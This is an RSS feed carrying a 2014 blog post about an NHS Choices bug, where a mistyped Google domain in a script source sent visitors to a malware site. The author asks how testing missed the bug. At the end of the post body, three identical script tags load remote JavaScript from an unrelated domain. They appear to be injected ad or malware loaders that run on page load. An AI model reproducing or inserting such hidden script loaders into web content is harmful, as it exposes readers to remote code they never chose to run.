<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Where Worlds Collide &#187; NHS</title>
	<atom:link href="http://www.kalyr.co.uk/weblog/tag/nhs/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.kalyr.co.uk/weblog</link>
	<description>The blogs of Tim Hall</description>
	<lastBuildDate>Fri, 10 Mar 2017 15:33:59 +0000</lastBuildDate>
	<language>en-US</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=3.7.41</generator>
	<item>
		<title>The NHS Czech Malware Bug</title>
		<link>http://www.kalyr.co.uk/weblog/computing/testing/the-nhs-czech-malware-bug/</link>
		<comments>http://www.kalyr.co.uk/weblog/computing/testing/the-nhs-czech-malware-bug/#comments</comments>
		<pubDate>Mon, 03 Feb 2014 21:57:37 +0000</pubDate>
		<dc:creator><![CDATA[Tim Hall]]></dc:creator>
				<category><![CDATA[Testing & Software]]></category>
		<category><![CDATA[NHS]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.kalyr.co.uk/weblog/?p=9793</guid>
		<description><![CDATA[A bug in the NHS Choice website gets exploited by a malware site. How did this one get past testing? <a href="http://www.kalyr.co.uk/weblog/computing/testing/the-nhs-czech-malware-bug/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>A bug in the NHS Choices system <a href="http://www.theguardian.com/technology/2014/feb/03/nhs-choices-bug-malware-site">sent users to a malware site</a>. As reported in The Guardian:</p>
<blockquote><p>&#8220;Last year, a developer accidentally put &#8220;translate.googleaspis.com&#8221; rather than &#8220;translate.googleapis.com&#8221; as the source for the JavaScript file,&#8221; an NHS Choices spokesperson told the Guardian.</p>
<p>The â€œinternal coding errorâ€ sent users to the mistyped URL, of which a third-party appears to have taken advantage, registering the mistyped domain name to serve adverts and malware to unknowingly redirected visitors from the NHS Choices website since Sunday evening.</p></blockquote>
<p>Things like that make me wonder how on earth that bug could have been missed in testing, even though t&#8217;s not easy to answer that question without some knowledge of the archtecture of the site. I would assume from the URL that it&#8217;s some form of translation functionality, and I&#8217;d have thought somebody ought to have noticed the feature wasn&#8217;t working properly and investigated it little more deeply.</p>
<p>What I would like to know is how the Czech malware operator managed to find the bug when NHS&#8217;s own testing didn&#8217;t.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kalyr.co.uk/weblog/computing/testing/the-nhs-czech-malware-bug/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
